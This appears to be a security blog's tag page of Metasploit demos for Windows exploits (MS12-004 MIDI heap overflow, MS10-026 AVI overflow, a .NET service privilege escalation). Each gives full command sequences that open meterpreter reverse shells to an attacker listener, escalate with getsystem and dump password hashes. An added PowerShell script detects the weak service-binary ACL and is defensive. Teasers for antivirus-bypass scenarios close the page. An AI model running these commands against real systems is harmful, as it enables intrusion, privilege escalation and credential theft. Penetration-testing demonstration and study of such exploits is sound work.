Posts tagged Windows
MS12-004 Windows Media Remote Code Execution Metasploit Demo
Timeline :
Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability on 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided on 2012-01-27
PoC provided by :
Shane Garrett
juan vazquez
sinn3r
Reference(s) :
MS12-004
CVE-2012-0003
OSVDB-78210
Affected version(s) :
Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1
Tested on Windows XP SP3 with :
winmm.dll 5.1.2600.5512
Description :
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than the amount available on the heap (0x400 bytes allocated by WINMM!winmmAlloc), which then allows an “inc al” or “dec al” of a single byte. This can be used to corrupt an array (CImplAry) that the exploit sets up, and force the browser to confuse the types of tagVARIANT objects, which leads to remote code execution in the context of the current user. At this time, for the IE 8 target, the JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Commands :
use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo
Timeline :
Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability on 2010-04-13
Metasploit PoC provided on 2011-08-12
PoC provided by :
Yamata Li
Shahin Ramezany
juan vazquez
Jordi Sanchez
Reference(s) :
CVE-2010-0480
OSVDB-63749
MS10-026 (KB977816)
Affected version(s) :
Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Tested on Windows XP SP3 with :
Internet Explorer 6
Description :
This module exploits a buffer overflow in l3codecx.ax while processing AVI files with MPEG Layer-3 audio content. The overflow only allows overwriting with 0’s, so the three least significant bytes of the EIP saved on the stack are overwritten, and the shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note that on IE 8 targets, your malicious URL must be a trusted site in order to load the .NET control.
Commands :
use exploit/windows/browser/ms10_026_avi_nsamplespersec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
getuid
sysinfo
ipconfig
EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
Timeline :
Vulnerability disclosed by XenoMuta on Exploit-DB on 2011-03-08
Metasploit PoC provided by David Rude on 2011-03-08
PoC provided by :
XenoMuta
David Rude
Reference(s) :
EDB-ID-16940
Affected version(s) :
Microsoft .NET Framework 2.0 and 4.0
Tested on Windows XP SP3 with :
Microsoft .NET Framework v2.0.50727 (mscorsvw.exe)
Description :
This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary, so a low-privileged user can replace the service binary and have it run with the service’s privileges. It seems to work on Windows XP SP3, 2003 R2 and 7.
Commands :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
background
use post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploit
sessions -i 2
getuid
hashdump
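The condition the post module above abuses is a file ACL that lets non-administrators modify mscorsvw.exe. The following PowerShell script is an added example (not part of the original post or of the Metasploit module) that checks a host for that condition: it locates the .NET Runtime Optimization service binaries through WMI and reports any Allow ACE that grants write-type rights to Users, Power Users, Authenticated Users, Everyone or a Domain Users group. It assumes that the service names start with “clr_optimization” (the naming used by the .NET 2.0 and 4.0 installers) and uses Get-WmiObject so that it also runs on the Windows XP / PowerShell 2.0 era systems the post was tested on.

```powershell
# Added example: detect the weak ACL on the .NET Runtime Optimization service
# binary (mscorsvw.exe) described for EDB-ID-16940. Not the exploit itself.
# Assumption: the service names start with "clr_optimization" (true for the
# .NET 2.0 and 4.0 installers); adjust the filter if your install differs.

# Principals that must not hold write rights on a service binary.
$LowPrivGroups = @(
    'BUILTIN\Users',
    'BUILTIN\Power Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone'
)
# Catches "<DOMAIN>\Domain Users" for any domain name.
$DomainUsersPattern = '\\Domain Users$'

# Rights that allow replacing or altering the executable (or granting oneself
# the ability to do so).
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName may be quoted and may carry arguments;
    # keep only the executable path.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Test-WeakServiceBinaryAcl {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    $findings = @()
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $id = $ace.IdentityReference.Value
        $lowPriv = ($LowPrivGroups -contains $id) -or ($id -match $DomainUsersPattern)
        if (-not $lowPriv) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -ne 0) {
            $findings += [pscustomobject]@{
                Path     = $Path
                Identity = $id
                Rights   = $ace.FileSystemRights
            }
        }
    }
    return $findings
}

# Locate every .NET Runtime Optimization service (2.0, 4.0, 32/64-bit).
$services = Get-WmiObject Win32_Service | Where-Object { $_.Name -like 'clr_optimization*' }
if (-not $services) {
    Write-Host 'No .NET Runtime Optimization service found on this host.'
    exit 0
}

$results = foreach ($svc in $services) {
    $bin = Get-ServiceBinaryPath $svc.PathName
    if (-not (Test-Path -LiteralPath $bin)) { continue }
    Test-WeakServiceBinaryAcl -Path $bin
}

if ($results) {
    Write-Warning 'mscorsvw.exe is writable by a low-privileged principal (EDB-ID-16940 condition):'
    $results | Format-Table -AutoSize
} else {
    Write-Host 'No low-privileged write access to the service binary found.'
}
```

Run it from an ordinary user session on the target; a non-empty table means the post module’s precondition holds, and the fix is to restore an ACL in which only SYSTEM, Administrators and TrustedInstaller have write rights on the binary and its directory.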
Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus
Third scenario of the Metasploit Exploitation Scenarios.
Here, the user is a standard user, protected by 5 countermeasures :
- Firewall rules that limit outbound connections to specific ports only.
- Transparent HTTP/S proxy for web surfing.
- Dual antivirus (Avira / ClamAV) scanning for web surfing (useless in this case, due to the Astaro bugs).
- Dr.Web Antivirus on the target Windows XP.
- Windows Firewall on the target Windows XP.
Metasploit Exploitation Scenarios – Scenario 2 Lavasoft Ad-Aware & Windows Defender
Here is the second scenario of the Metasploit Exploitation Scenarios series. Below you will find a SlideShare presentation and a YouTube video demonstrating the scenario. If you have any comments or suggestions, don’t hesitate.